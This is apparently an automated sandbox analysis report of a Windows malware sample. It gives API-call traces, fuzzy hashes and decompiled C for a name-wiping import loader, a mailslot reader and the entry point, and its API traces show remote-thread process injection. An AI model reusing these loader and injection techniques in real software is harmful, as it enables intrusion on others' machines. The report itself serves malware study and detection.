Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring

Similarity

Total matches: 5
API ID: VirtualAllocVirtualFreelstrcpynmemcpy
String ID: Apr 14 2018$pnls$pnls
API String ID: 1980370899-1480254790
Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f

APIs

lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106

Strings

pnls, xrefs: 002E40DF
pnls, xrefs: 002E40DA
Apr 14 2018, xrefs: 002E4083

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
